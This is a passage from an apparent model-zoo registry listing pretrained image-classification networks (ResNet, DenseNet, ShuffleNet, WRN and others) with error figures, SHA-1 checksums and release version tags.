('bn_vgg19b', '0815', '3a0e43e66836ea5ab4f6d4c0425e2ab2abcb5766', 'v0.0.110'),
('bninception', '0776', '8314001b410c26120a9cf9e1d84a3770ba31b128', 'v0.0.139'),
('resnet10', '1385', 'a996427482bd5bd427db1d811d2a69bfd35987fc', 'v0.0.248'),
('resnet12', '1303', '8f492c28cd7c4c1bfc89c88649629e64487d5d00', 'v0.0.253'),
('resnet14', '1220', 'fcdddcef6a9fe9c472058e883a08cf09bbeb6738', 'v0.0.256'),
('resnetbc14b', '1116', 'c4ffed61c1b542e33794f22ab48bce568b9bf7bb', 'v0.0.309'),
('resnet16', '1088', '2bc07547e9d007825c89bdcf6879e346e7372028', 'v0.0.259'),
('resnet18_wd4', '1740', 'a74ea15d056a84133e02706a6c7f8ed8f50c8462', 'v0.0.262'),
('resnet18_wd2', '1284', '9a5154065311c8ffbbc57b20a443b205c7a910fa', 'v0.0.263'),
('resnet18_w3d4', '1066', '1a574a4198a5bbf01572c2b3f091eb824ff8196e', 'v0.0.266'),
('resnet18', '0951', '98a2545bf310e974848d96dee8da9095db623fbc', 'v0.0.153'),
('resnet26', '0837', 'd81d836f0e8808d7bc3d85db08207b91d4b2c68f', 'v0.0.305'),
('resnetbc26b', '0758', '2b5e8d0888936a340ea13c7e8ba30b237cd62f1c', 'v0.0.313'),
('resnet34', '0743', '5cdeeccda6f87fe13aed279213006061a8b42037', 'v0.0.291'),
('resnetbc38b', '0672', '820944641ba54f4aaa43d2a305ab52b9dcb740c7', 'v0.0.328'),
('resnet50', '0604', 'a71d1d2a8e8e4259742bbd67c386623233b57c6c', 'v0.0.329'),
('resnet50b', '0611', 'ca12f8d804000bf5202e2e3838dec7ef6b772149', 'v0.0.308'),
('resnet101', '0599', 'a6d3a5f4933794d56b61867c050ee730f6310f1b', 'v0.0.1'),
('resnet101b', '0539', '7406d85891b64717ae0a823d147e9e9e8921e868', 'v0.0.145'),
('resnet152', '0535', 'bbdd7ed1f33a9b33c75635d78143e8bd00e204e0', 'v0.0.144'),
('resnet152b', '0525', '6f30d0d99e1765e78370c92cd400f50eeb59b6f9', 'v0.0.143'),
('preresnet10', '1401', '2b96c0818dbabc422e98d8fbfc9b684c023922ed', 'v0.0.249'),
('preresnet12', '1321', 'b628efb5415784075e18b6734b1ba1e5c7280dee', 'v0.0.257'),
('preresnet14', '1218', 'd65fa6287414d9412e34ac0df6921eaa5646a2b6', 'v0.0.260'),
('preresnetbc14b', '1151', 'c712a235b75ad4956411bab265dfd924c748726e', 'v0.0.315'),
('preresnet16', '1081', '5b00b55f74adb9ee4a6ba5f946aafd48b4d8aa47', 'v0.0.261'),
('preresnet18_wd4', '1778', '3d949d1ae20b9188a423b56a1f7a89b4bcecc3d2', 'v0.0.272'),
('preresnet18_wd2', '1319', '63e55c24bc0ae93a8f8daefa4b35dc3e70147f65', 'v0.0.273'),
('preresnet18_w3d4', '1068', 'eb5698616757fd0947851f62c33fc4d7b4a5f23a', 'v0.0.274'),
('preresnet18', '0951', '71279a0b7339f1efd12bed737219a9ed76175a9d', 'v0.0.140'),
('preresnet26', '0834', 'c2ecba0948934c28d459b7f87fbc1489420fd4fb', 'v0.0.316'),
('preresnetbc26b', '0786', '265f591f320db0915c18c16f4ed0e2e53ee46567', 'v0.0.325'),
('preresnet34', '0751', 'ba9c829e72d54f8b02cf32ea202c195d36568467', 'v0.0.300'),
('preresnet50', '0620', '50f13b2d3fd197c8aa721745adaf2d6615fd8c16', 'v0.0.330'),
('preresnet50b', '0632', '951de2dc558f94f489ce62fedf979ccc08361641', 'v0.0.307'),
('preresnet101', '0575', 'e2887e539f2519c36aea0fc991d6503ed384c4fc', 'v0.0.2'),
('preresnet101b', '0588', '1015145a6228aa16583a975b9c33f879ee2a6fc0', 'v0.0.2'),
('preresnet152', '0532', '31505f719ad76f5aee59d37a695ac7a9b06230fc', 'v0.0.14'),
('preresnet152b', '0575', 'dc303191ea47ca258f5abadd203b5de24d059d1a', 'v0.0.2'),
('preresnet200b', '0564', '38f849a61f59924d85a9353923424889a77c93dc', 'v0.0.45'),
('preresnet269b', '0556', 'f386e3e70ab4df48fd8b444858bd6acd8afcbe6b', 'v0.0.239'),
('resnext14_32x4d', '1110', '9be6190e328c15a06703be3ba922d707c2f4d8e7', 'v0.0.327'),
('resnext26_32x4d', '0721', '5264d7efd606e1c95a2480050e9f03a7a2f02b09', 'v0.0.332'),
('resnext101_32x4d', '0579', '9afbfdbc5a420a9f56058be0bf80d12b21a627af', 'v0.0.10'),
('resnext101_64x4d', '0541', '0d4fd87b8de78c5c0295e1dcb9923a578dce7adb', 'v0.0.10'),
('seresnet50', '0644', '10954a846a56a387a6a222e260d95fb8a9bd68c3', 'v0.0.11'),
('seresnet101', '0589', '4c10238dd485a540a464bf1c39a8752d2da040b9', 'v0.0.11'),
('seresnet152', '0577', 'de6f099dd39f374390639ca8854b2954af3c59b9', 'v0.0.11'),
('seresnext50_32x4d', '0558', 'a49f8fb039973979afe2fc70974a8b07c7159bca', 'v0.0.12'),
('seresnext101_32x4d', '0500', 'cf1612601f319a0e75190ae756ae380b947dcb1a', 'v0.0.12'),
('senet154', '0465', 'dd2445078c0770c4a52cd22aa1d4077eb26f6132', 'v0.0.13'),
('ibn_resnet50', '0668', 'db527596f81f5b4aa1f0c490bf0ef5cfeef5fb76', 'v0.0.127'),
('ibn_resnet101', '0587', '946e7f1072a70b19f2bbc9776f73b818473482c3', 'v0.0.127'),
('ibnb_resnet50', '0697', '0aea51d29d4123676e447b92db800f5a574a35be', 'v0.0.127'),
('ibn_resnext101_32x4d', '0562', '05ddba79597927b5c0fa516d435c3788803438f6', 'v0.0.127'),
('ibn_densenet121', '0747', '1434d379777ff6b61469f7adc6ed73919da94f02', 'v0.0.127'),
('ibn_densenet169', '0682', '6d7c48c5519c6b8595223514564b1061268742a2', 'v0.0.127'),
('airnet50_1x64d_r2', '0621', '347358cc4a3ac727784665e8113cd11bfa79c606', 'v0.0.120'),
('airnet50_1x64d_r16', '0646', '0b847b998253ba22409eed4b939ec2158928a33f', 'v0.0.120'),
('airnext50_32x4d_r2', '0575', 'ab104fb5225b17836d523a525903db254f5fdd99', 'v0.0.120'),
('bam_resnet50', '0696', '7e573b617562d7dab94cda3b1a47ec0085aaeba2', 'v0.0.124'),
('cbam_resnet50', '0638', '78be56658e9f9452d7c2472c994b332d97807a17', 'v0.0.125'),
('pyramidnet101_a360', '0652', '08d5a5d1af3d514d1114ce76277223e8c1f5f426', 'v0.0.104'),
('diracnet18v2', '1117', '27601f6fa54e3b10d77981f30650d7a9d4bce91e', 'v0.0.111'),
('diracnet34v2', '0946', '1faa6f1245e152d1a3e12de4b5dc1ba554bc3bb8', 'v0.0.111'),
('crunet56', '0825', 'ad16523bfa306aefae5f931ed3bd6d01cd6d1804', 'v0.0.197'),
('densenet121', '0685', 'd3a1fae8b311343498f736e494d60d32e35debfb', 'v0.0.314'),
('densenet161', '0618', '52e30516e566bdef53dcb417f86849530c83d0d1', 'v0.0.3'),
('densenet169', '0689', '281ec06b02f407b4523245622371da669a287044', 'v0.0.3'),
('densenet201', '0636', '65b5d389b1f2a18c62dc39f74960266c601fec76', 'v0.0.3'),
('condensenet74_c4_g4', '0864', 'cde68fa2fcc9197e336717a17753a15a6efd7596', 'v0.0.4'),
('condensenet74_c8_g8', '1049', '4cf4a08e7fb46f5821049dcae97ae442b0ceb546', 'v0.0.4'),
('peleenet', '1125', '38d4fb245659a54204ca8f3562069b786eace1b1', 'v0.0.141'),
('wrn50_2', '0612', 'f8013e680bf802301e6830e5ca12de73382edfb1', 'v0.0.113'),
('drnc26', '0789', 'ee56ffabbcceba2e4063c80a3f84a4f4f8461bff', 'v0.0.116'),
('drnc42', '0692', 'f89c26d6a3792bef0850b7fe09ee10f715dcd3ce', 'v0.0.116'),
('drnc58', '0627', '44cbf15ccaea33ee1e91b780e70170e8e66b12d7', 'v0.0.116'),
('drnd22', '0852', '085747529f2d4a0490769e753649843c40dea410', 'v0.0.116'),
('drnd38', '0736', 'c7d53bc0f70196dda589fcf0bfac904b5d76d872', 'v0.0.116'),
('drnd54', '0627', '87d44c87953d98241f85007802a61e3cefd77792', 'v0.0.116'),
('drnd105', '0581', 'ab12d66220c1bbf4af5c33db78aaafc9f0d9bd5a', 'v0.0.116'),
('dpn68', '0658', '07251919c08640c94375670cbc5f0fbc312ed59b', 'v0.0.310'),
('dpn98', '0528', 'fa5d6fca985afde21f6374e4a4d4df788d1b4c3a', 'v0.0.17'),
('dpn131', '0522', '35ac2f82e69264e0712dcb979da4d99675e2f2aa', 'v0.0.17'),
('darknet_tiny', '1746', '16501793621fbcb137f2dfb901760c1f621fa5ec', 'v0.0.69'),
('darknet_ref', '1668', '3011b4e14b629f80da54ab57bef305d588f748ab', 'v0.0.64'),
('darknet53', '0556', 'e9486353868e0cf78bdc8fa377437de4d02733bb', 'v0.0.150'),
('irevnet301', '0897', 'cef9b5bfe9dd51c7d7946de432fd358f54239d35', 'v0.0.251'),
('bagnet9', '3544', 'ea1ae64532fc58e4efe585b3154aa4b42a677d77', 'v0.0.255'),
('bagnet17', '2152', '4b3a621287346dc836fe42de0b0888fb9a1c9075', 'v0.0.255'),
('bagnet33', '1495', '87527d8247b62bccfdd76a9d5e6e914ebfa5362a', 'v0.0.255'),
('dla34', '0821', '1127fa0a270ed5fe1112d9039cf44ee06ac18817', 'v0.0.202'),
('dla46c', '1286', '5b38b67fecf2d701b736eb23e1301b6dd7eb5fb9', 'v0.0.282'),
('dla46xc', '1225', 'e570f5f00a098b0de34e657f9d8caeda524d39f3', 'v0.0.293'),
('dla60', '0708', '954571d6917a836cb3433b664fd1b8330955c0fa', 'v0.0.202'),
('dla60x', '0621', '35774214758743caeae249482bcf8a0ab8caf456', 'v0.0.202'),
('dla60xc', '1074', '1b4e4048847e1ba060eb76538ee09e760f40be11', 'v0.0.289'),
('dla102', '0644', 'cadbb1cc5feb58497198aac2c8028c843a6d5a9f', 'v0.0.202'),
('dla102x', '0602', '193568a7ab3c0a3b6702fcc3e326b7fef011f752', 'v0.0.202'),
('dla102x2', '0553', '30c8f409240872053c5bb8523baeb274ba9da4ee', 'v0.0.202'),
('dla169', '0587', '4f3e6a6e604cc06ebcf63fc86cc5287399f32683', 'v0.0.202'),
('fishnet150', '0638', '5cbd08ec1534f2d5e7861395cc6f224ecbe8cb76', 'v0.0.168'),
('espnetv2_wd2', '2107', 'f2e17f0a8845b72f4645a0c06f2cfc8d9ef0253e', 'v0.0.238'),
('espnetv2_w1', '1427', '538f31fb92699fddabc27784fe746871fd8a635b', 'v0.0.238'),
('espnetv2_w5d4', '1273', 'b119ad9e52bf8c2d88db8eeb62a1fd6e23a1b6a6', 'v0.0.238'),
('espnetv2_w3d2', '1194', '3804a85006d874273b80026339b36943e9d813e5', 'v0.0.238'),
('espnetv2_w2', '0994', 'c212d81a9d12361b7d49ec841599f6a0f84f7b44', 'v0.0.238'),
('squeezenet_v1_0', '1734', 'e6f8b0e8253cef1c5c071dfaf2df5fdfc6a64f8c', 'v0.0.128'),
('squeezenet_v1_1', '1739', 'd7a1483aaa1053c7cd0cf08529b2b87ed2781b35', 'v0.0.88'),
('squeezeresnet_v1_0', '1767', '66474b9b6a771055b28c37b70621c026a1ef6ef4', 'v0.0.178'),
('squeezeresnet_v1_1', '1784', '26064b82773e7a7175d6038976a73abfcd5ed2be', 'v0.0.70'),
('sqnxt23_w1', '1866', '73b700c40de5f7be9d2cf4ed30cc8935c670a3c3', 'v0.0.171'),
('sqnxt23v5_w1', '1743', '7a83722e7d362cef950d8534020f837caf9e6314', 'v0.0.172'),
('sqnxt23_w3d2', '1321', '4d733bcd19f1e502ebc46b52f0b69d959636902e', 'v0.0.210'),
('sqnxt23v5_w3d2', '1268', '4f98bbd3841d8d09a067100841f64ce3eccf184a', 'v0.0.212'),
('sqnxt23_w2', '1063', '95d9b55a5e857298bdb7974db6e3dbd9ecc94401', 'v0.0.240'),
('sqnxt23v5_w2', '1024', '707246f323bc95d0ea2d5608e9e85ae9fe59773a', 'v0.0.216'),
('shufflenet_g1_wd4', '3677', 'ee58f36811d023e1b2e651469c470e588c93f9d3', 'v0.0.134'),
('shufflenet_g3_wd4', '3617', 'bd08e3ed6aff4993cf5363fe8acaf0b22394bea0', 'v0.0.135'),
('shufflenet_g1_wd2', '2238', 'f77dcd18d3b759a3046bd4a2443c40e4ff455313', 'v0.0.174'),
('shufflenet_g3_wd2', '2060', 'ea6737a54bce651a0e8c0b533b982799842cb1c8', 'v0.0.167'),
('shufflenet_g1_w3d4', '1675', '2f1530aa72ee04e3599c5296b590a835d9d50e7f', 'v0.0.218'),
('shufflenet_g3_w3d4', '1609', 'e008e926f370af28e587f349384238d240a0fc02', 'v0.0.219'),
('shufflenet_g1_w1', '1350', '01934ee8f4bf7eaf4e36dd6442debb84ca2a2849', 'v0.0.223'),
('shufflenet_g2_w1', '1332', 'f5a1479fd8523032ee17a4de00fefd33ff4d31e6', 'v0.0.241'),
('shufflenet_g3_w1', '1329', 'ac58d62c5f277c0e9e5a119cc1f48cb1fcfc8306', 'v0.0.244'),
('shufflenet_g4_w1', '1310', '73c039ebf56f9561dd6eecc4cbad1ab1db168ed1', 'v0.0.245'),
('shufflenet_g8_w1', '1319', '9a50ddd9ce67ec697e3ed085d6c39e3d265f5719', 'v0.0.250'),
('shufflenetv2_wd2', '1830', '156953de22d0e749c987da4a58e0e53a5fb18291', 'v0.0.90'),
('shufflenetv2_w1', '1123', '27435039ab7794c86ceab11bd93a19a5ecab78d2', 'v0.0.133'),
('shufflenetv2_w3d2', '0913', 'f132506c9fa5f0eb27398f9936b53423d0cd5b66', 'v0.0.288'),
('shufflenetv2_w2', '0823', '2d67ac62057103fd2ed4790ea0058e0922abdd0f', 'v0.0.301'),
('shufflenetv2b_wd2', '1782', '845a9c43cf4a9873f89c6116634e74329b977e64', 'v0.0.157'),
('shufflenetv2b_w1', '1101', 'f679702f7c626161413320160c6c9c199de9b667', 'v0.0.161'),
('shufflenetv2b_w3d2', '0879', '4022da3a5922127b1acf5327bd9f1d4d55726e05', 'v0.0.203'),
('shufflenetv2b_w2', '0810', '7429df751916bf24bd7fb86bc137ae36275b9d19', 'v0.0.242'),
('menet108_8x1_g3', '2030', 'aa07f925180834389cfd3bf50cb22d2501225118', 'v0.0.89'),
('menet128_8x1_g4', '1913', '0c890a76fb23c0af50fdec076cb16d0f0ee70355', 'v0.0.103'),
('menet160_8x1_g8', '2028', '4f28279a94e631f6a51735de5ea29703cca69845', 'v0.0.154'),
('menet228_12x1_g3', '1289', '2dc2eec7c9ebb41c459450e1843503b5ac7ecb3a', 'v0.0.131'),
('menet256_12x1_g4', '1216', '7caf63d15190648e266a4e7520c3ad677716f388', 'v0.0.152'),
('menet348_12x1_g3', '0936', '62c72b0b56460f062d4da7155bd64a524f42fb88', 'v0.0.173'),
('menet352_12x1_g8', '1167', '5892fea4e44eb27814a9b092a1a06eb81cea7844', 'v0.0.198'),
('menet456_24x1_g3', '0780', '7a89b32c89f878ac63fc96ddc71cb1a5e91c84d6', 'v0.0.237'),
('mobilenet_wd4', '2218', '3185cdd29b3b964ad51fdd7820bd65f091cf281f', 'v0.0.62'),
('mobilenet_wd2', '1330', '94f13ae1375b48892d8ecbb4a253bb583fe27277', 'v0.0.156'),
('mobilenet_w3d4', '1051', '6361d4b4192b5fc68f3409100d825e8edb28876b', 'v0.0.130'),
('mobilenet_w1', '0865', 'eafd91e9369abb09726f2168aba24453b17fc22e', 'v0.0.155'),
('fdmobilenet_wd4', '3053', 'd4f18e5b4ed63e5426eafbf5db7f8e2a97c28581', 'v0.0.177'),
('fdmobilenet_wd2', '1969', '242b9fa82d54f54f08b4bdbb194b7c89030e7bc4', 'v0.0.83'),
('fdmobilenet_w3d4', '1601', 'cb10c3e129706d3023d752e7402965af08f91ca7', 'v0.0.159'),
('fdmobilenet_w1', '1312', '95fa0092aac013c88243771faf66ef1134b7574d', 'v0.0.162'),
('mobilenetv2_wd4', '2412', 'd92b5b2dbb52e27354ddd673e6fd240a0cf27175', 'v0.0.137'),
('mobilenetv2_wd2', '1442', 'd7c586c716e3ea85e793f7c5aaf9cae2a907117b', 'v0.0.170'),
('mobilenetv2_w3d4', '1044', '768454f4bdaae337c180bb81248b8c5b8d31040b', 'v0.0.230'),
('mobilenetv2_w1', '0864', '6e58b1cb96852e4c6de6fc9cd11241384af21df9', 'v0.0.213'),
('igcv3_wd4', '2830', '71abf6e0b6bff1d3a3938bfea7c752b59ac05e9d', 'v0.0.142'),
('igcv3_wd2', '1703', '145b7089e1d0e0ce88f17393a357d5bb4ae37734', 'v0.0.132'),
('igcv3_w3d4', '1096', '3c7c86fc43df2e5cf95a451ebe07fccf2d9dc076', 'v0.0.207'),
('igcv3_w1', '0900', 'e2c3da1cffd8e42da7a052b80db2f86758c8d35b', 'v0.0.243'),
('mnasnet', '1144', 'c972fec0521e0222259934bf77c57ebeebff5bdf', 'v0.0.117'),
('darts', '0897', 'aafd645210df6b55587ef02f4edf08c76a15e5a3', 'v0.0.118'),
('proxylessnas_cpu', '0750', '256da7c8a05cd87a59e30e314b22dc1d4565946e', 'v0.0.324'),
('proxylessnas_gpu', '0724', 'd9ce80964e37fb30bddcc552f1d68361b1a94873', 'v0.0.333'),
('proxylessnas_mobile', '0780', 'b8bb5a64f333562475dcfc09eeb7e603d6e66afb', 'v0.0.326'),
('proxylessnas_mobile14', '0651', 'f08baec85343104994b821581cde3ee965a2c593', 'v0.0.331'),
('xception', '0556', 'bd2c1684a5dc41dd00b4676c194a967558ed577e', 'v0.0.115'),
('inceptionv3', '0559', '6c087967685135a321ed66b9ad2277512e9b2868', 'v0.0.92'),
('inceptionv4', '0525', 'f7aa9536392ea9ec7df5cc8771ff53c19c45fff2', 'v0.0.105'),
('inceptionresnetv2', '0494', '3328f7fa4c50c785b525e7b603926ec1fccbce14', 'v0.0.107'),
('polynet', '0453', '742803144e5a2a6148212570726350da09adf3f6', 'v0.0.96'),
('nasnet_4a1056', '0795', '5c78908e38c531283d86f9cbe7e14c2afd85a7ce', 'v0.0.97'),
('nasnet_6a4032', '0424', '73cca5fee009db77412c5fca7c826b3563752757', 'v0.0.101'),
('pnasnet5large', '0428', '998a548f44ac1b1ac6c4959a721f2675ab5c48b9', 'v0.0.114'),
('resnetd50b', '0549', '17d6004b5c6c1b97cfb47377ae5076810c5d88be', 'v0.0.296'),
('resnetd101b', '0461', 'fead1bcb86bba2be4ed7f0033fa972dc613e3280', 'v0.0.296'),
('resnetd152b', '0467', 'd0fe2fe09c6462de17aca4a72bbcb08b76a66e02', 'v0.0.296'),
('nin_cifar10', '0743', '9696dc1a8f67e7aa233836bcbdb99625769b1e86', 'v0.0.175'),
('nin_cifar100', '2839', 'eed0e9af2cd8e5aa77bb063204525812dbd9190f', 'v0.0.183'),
('nin_svhn', '0376', '7cb750180b0a981007194461bf57cfd90eb59c88', 'v0.0.270'),
('resnet20_cifar10', '0597', '13c5ab19145591d75873da3497be1dd1bd2afd46', 'v0.0.163'),
('resnet20_cifar100', '2964', '4e1443526ee96648bfe4d4954871a97a9c9622f4', 'v0.0.180'),
('resnet20_svhn', '0343', '7ac0d94a4563c9611092ce08f2124a3828103139', 'v0.0.265'),
('resnet56_cifar10', '0452', 'a73e63e9d0f3f7adde59b4142323c0dd05930de7', 'v0.0.163'),
('resnet56_cifar100', '2488', '590977100774a289b91088245dd2bd0cbe6567e6', 'v0.0.181'),
('resnet56_svhn', '0275', 'e676e4216a771b7d0339e87284c7ebb03af8ed25', 'v0.0.265'),
('resnet110_cifar10', '0369', 'f89f1c4d9fdd9e5cd00949a872211376979ff703', 'v0.0.163'),
('resnet110_cifar100', '2280', '6c5fa14bb4ced2dffe6ee1536306687aae57f9cb', 'v0.0.190'),
('resnet110_svhn', '0245', '0570b5942680cf88c66ae9a76c0e7ff0a41e71a6', 'v0.0.265'),
('resnet164bn_cifar10', '0368', 'e7941eeeddef9336664522eaa3af92d77128cac0', 'v0.0.179'),
('resnet164bn_cifar100', '2044', 'c7db7b5e6fbe6dc0f9501d25784f1a107c6e0315', 'v0.0.182'),
('resnet164bn_svhn', '0242', '8cdce67452d2780c7c69f4d0b979e80189d4bff8', 'v0.0.267'),
('resnet1001_cifar10', '0328', 'bb979d53089138b5060b418cad6c8ad9a940bf81', 'v0.0.201'),
('resnet1001_cifar100', '1979', '692d9516620bc8b7a4da30a98ebcb7432243f5e9', 'v0.0.254'),
('resnet1202_cifar10', '0353', '377510a63595e544333f6f57523222cd845744a8', 'v0.0.214'),
('preresnet20_cifar10', '0651', 'daa895737a34edda75c40f2d8566660590c84a3f', 'v0.0.164'),
('preresnet20_cifar100', '3022', '37f15365d48768f792f4551bd6ccf5259bc70530', 'v0.0.187'),
('preresnet20_svhn', '0322', '608cee12c0bc3cb59feea96386f6c12c6da91ba5', 'v0.0.269'),
('preresnet56_cifar10', '0449', 'cb37cb9d4524d4e0f5724aeed9face455f527efc', 'v0.0.164'),
('preresnet56_cifar100', '2505', '4c39e83f567f15d6ee0d69bf2dcaccd62067dfe5', 'v0.0.188'),
('preresnet56_svhn', '0280', 'b974c2c96a18ff2278f1d33df58c8537f9139ed9', 'v0.0.269'),
('preresnet110_cifar10', '0386', 'd6d4b7bd9f154eca242482a7559413d5c7b6d465', 'v0.0.164'),
('preresnet110_cifar100', '2267', '18cf4161c67c03e50cff7eb30988a559f3f97260', 'v0.0.191'),
('preresnet110_svhn', '0279', '6804450b744fa922d9ec22aa4c792d3a5da812f6', 'v0.0.269'),
('preresnet164bn_cifar10', '0364', '7ecf30cb818f80908ef4a77af4660c1080d0df81', 'v0.0.196'),
('preresnet164bn_cifar100', '2018', 'a20557c8968c04d8d07e40fdc5b0d1ec1fb3339d', 'v0.0.192'),
('preresnet164bn_svhn', '0258', '4aeee06affea89767c058fe1650b7476f05d8563', 'v0.0.269'),
('preresnet1001_cifar10', '0265', '50507ff74b6047abe6d04af6471d9bacafa05e24', 'v0.0.209'),
('preresnet1001_cifar100', '1841', '185e033d77e61cec588196e3fe8bf8dcb43acfab', 'v0.0.283'),
('preresnet1202_cifar10', '0339', '942cf6f22d80b5428256825234a252b8d6ebbe9d', 'v0.0.246'),
('resnext29_32x4d_cifar10', '0315', 'c8a1beda8ba616dc9af682d3ac172bfdd7a2472d', 'v0.0.169'),
('resnext29_32x4d_cifar100', '1950', '5f2eedcdd5cea6fdec1508f261f556a953ae28c2', 'v0.0.200'),
('resnext29_32x4d_svhn', '0280', 'dcb6aef96fbd76aa249e8f834093e2384b898404', 'v0.0.275'),
('resnext29_16x64d_cifar10', '0241', '76b97a4dd6185602a8ca8bdd77a70f8ddfcd4e83', 'v0.0.176'),
('resnext29_16x64d_cifar100', '1693', '1fcec90d6425e0405c61a1e90a80701ea556beca', 'v0.0.322'),
('pyramidnet110_a48_cifar10', '0372', '35b94d0575c2081a142e71955c8ceea8c51ec5e5', 'v0.0.184'),
('pyramidnet110_a48_cifar100', '2095', '00fd42a00492b2bbb28cacfb7b1a6c63072c37a3', 'v0.0.186'),
('pyramidnet110_a48_svhn', '0247', 'd8a5c6e20b6cc01989a52f9e307caf640169ed0a', 'v0.0.281'),
('pyramidnet110_a84_cifar10', '0298', '81710d7ab90838a8a299bf5f50aed2a3fa41f0e3', 'v0.0.185'),
('pyramidnet110_a84_cifar100', '1887', '6712d5dc69452f2fde1fcc3ee32c3164dcaffc4e', 'v0.0.199'),
('pyramidnet110_a270_cifar10', '0251', '1e769ce50ef915a807ee99907912c87766fff60f', 'v0.0.194'),
('pyramidnet110_a270_cifar100', '1710', '2732fc6430085192189fd7ccfd287881cc5a6c0d', 'v0.0.319'),
('pyramidnet164_a270_bn_cifar10', '0242', 'c4a79ea3d84344b9d352074122e37f593ee98fd2', 'v0.0.264'),
('pyramidnet164_a270_bn_cifar100', '1670', '08f46c7ff99e9c3fd7b5262e34dc8a00b316646f', 'v0.0.312'),
('pyramidnet200_a240_bn_cifar10', '0244', '52f4d43ec4d952f847c3a8e0503d5a4e6286679c', 'v0.0.268'),
('pyramidnet200_a240_bn_cifar100', '1609', 'e61e7e7eb6675aaf7a18461fea9bb3a53538d43b', 'v0.0.317'),
('pyramidnet236_a220_bn_cifar10', '0247', '1bd295a7fb834f639b238ffee818b3bde4126c81', 'v0.0.285'),
('pyramidnet236_a220_bn_cifar100', '1634', 'f066b3c6a4d217c42f5e8872fe23d343afe378ec', 'v0.0.312'),
('pyramidnet272_a200_bn_cifar10', '0239', 'd7b23c5460f059ac82ebc7b2cd992a203e098476', 'v0.0.284'),
('pyramidnet272_a200_bn_cifar100', '1619', '486e942734d91cd62d6bcbc283e1d7b56b734507', 'v0.0.312'),
('densenet40_k12_cifar10', '0561', '28dc0035549e51dcb53d1360707bd6f1558a5dcd', 'v0.0.193'),
('densenet40_k12_cifar100', '2490', '908f02ba7dbd7b8138f264193189e762a5590b1c', 'v0.0.195'),
('densenet40_k12_svhn', '0305', '645564c186a4e807293a68fb388803e36916e7b2', 'v0.0.278'),
('densenet40_k12_bc_cifar10', '0643', '7fdeda31c5accbddf47ab0f0b9a32cff723bf70d', 'v0.0.231'),
('densenet40_k12_bc_cifar100', '2841', '35cd8e6a2ae0896a8af2b689e076057fa19efa9b', 'v0.0.232'),
('densenet40_k12_bc_svhn', '0320', '6f2f98243fac9da22be26681bcd0a4d08e0f4baf', 'v0.0.279'),
('densenet40_k24_bc_cifar10', '0452', '13fa807e095b44ecaf3882e488b33a890d9d1e29', 'v0.0.220'),
('densenet40_k24_bc_cifar100', '2267', '2c4ef7c4bbe7f64784ad18b3845f4bf533f2ce57', 'v0.0.221'),
('densenet40_k24_bc_svhn', '0290', '03e136dd71bc85966fd2a4cb15692cfff3886df2', 'v0.0.280'),
('densenet40_k36_bc_cifar10', '0404', '4c154567e25619994a2f86371afbf1ad1e7475e9', 'v0.0.224'),
('densenet40_k36_bc_cifar100', '2050', 'd7275d39bcf439151c3bbeb707efa54943714b03', 'v0.0.225'),
('densenet40_k36_bc_svhn', '0260', 'b81ec8d662937851beecc62f36209fd8db464265', 'v0.0.311'),
('densenet100_k12_cifar10', '0366', '4e371ccb315d0fcd727a76255ca62ae9e92059cc', 'v0.0.205'),
('densenet100_k12_cifar100', '1964', '2ed5ec27a4d4a63876a4cacf52be53c91fbecb5f', 'v0.0.206'),
('densenet100_k12_svhn', '0260', '3e2b34b2087fe507a3672bfce1520747fca58046', 'v0.0.311'),
('densenet100_k24_cifar10', '0313', '9f795bac946d1390cf59f686b730fe512c406bd2', 'v0.0.252'),
('densenet100_k24_cifar100', '1808', '9bfa3e9c736a80906d163380cb361b940c2188bf', 'v0.0.318'),
('densenet100_k12_bc_cifar10', '0416', '6685d1f4844b092471f7d03dfc3fa64a302008e6', 'v0.0.189'),
('densenet100_k12_bc_cifar100', '2119', 'fbd8a54c1c9e4614f950b8473f8524d25caba4a7', 'v0.0.208'),
('densenet190_k40_bc_cifar10', '0252', '87b15be0620c0adff249d33540c20314188b16d7', 'v0.0.286'),
('densenet250_k24_bc_cifar10', '0267', 'dad68693d83a276d14a87dce6cebc5aceebca775', 'v0.0.290'),
('densenet250_k24_bc_cifar100', '1739', '598e91b7906f427296ab72cf40032f0846a52d91', 'v0.0.303'),
('xdensenet40_2_k24_bc_cifar10', '0531', '66c9d384d3ef4ec4095c9759bb8b7986f2f58e26', 'v0.0.226'),
('xdensenet40_2_k24_bc_cifar100', '2396', '73d5ba88a39b971457b9cea2cd72d1e05ab4d165', 'v0.0.227'),
('xdensenet40_2_k24_bc_svhn', '0287', '745f374b398bce378903af8c71cb3c67f6891d7f', 'v0.0.306'),
('xdensenet40_2_k36_bc_cifar10', '0437', 'e9bf419295f833b56fa3da27218107ed42310307', 'v0.0.233'),
('xdensenet40_2_k36_bc_cifar100', '2165', '78b6e754d90774d7b6ec3d811e6e57192148cfbf', 'v0.0.234'),
('xdensenet40_2_k36_bc_svhn', '0274', '4377e8918c1e008201aafc448f642642474eab14', 'v0.0.306'),
('wrn16_10_cifar10', '0293', 'ecf1c17c0814763095df562cb27d15a5aeb51836', 'v0.0.166'),
('wrn16_10_cifar100', '1895', 'bcb5c89ca71ffc99bc09b861b339724047724659', 'v0.0.204'),
('wrn16_10_svhn', '0278', '76f4e1361f9eca82fa4c2764b530f57280a34cfe', 'v0.0.271'),
('wrn28_10_cifar10', '0239', '16f3c8a249993f23b0f81d9ce3650faef5e455d8', 'v0.0.166'),
('wrn28_10_cifar100', '1788', '67ec43c6e913d43c8936809f04b0780035a24835', 'v0.0.320'),
('wrn28_10_svhn', '0271', 'fcd7a6b03a552b22ec25ee9a3833dc260976a757', 'v0.0.276'),
('wrn40_8_cifar10', '0237', '3b81d261706b751f5b731149b05fa92f500218e8', 'v0.0.166'),
('wrn40_8_cifar100', '1803', '114f6be2d5f8d561a5e3b4106fac30028defe300', 'v0.0.321'),
('wrn40_8_svhn', '0254', 'be7a21da6bc958c79725d7a29502c6a781cc67d9', 'v0.0.277'),
('wrn20_10_1bit_cifar10', '0326', 'c1a8ba4f1e1336a289c4b2eec75e25445b511ca6', 'v0.0.302'),
('wrn20_10_1bit_cifar100', '1904', 'adae01d6bec92d4fe388cddbb7f7eb598b1655d1', 'v0.0.302'),
('wrn20_10_1bit_svhn', '0273', 'ce9f819cf117fa66af112d9cbb0b65568623118d', 'v0.0.302'),
('wrn20_10_32bit_cifar10', '0314', '355496184493a55323c99bad9f79b0803548d373', 'v0.0.302'),
('wrn20_10_32bit_cifar100', '1812', 'd064f38aeaa14e9a2f4e9893ef6cca65615c53f9', 'v0.0.302'),
('wrn20_10_32bit_svhn', '0259', 'd9e8b46e180a34c0a765e22d24741f3849fca13a', 'v0.0.302'),
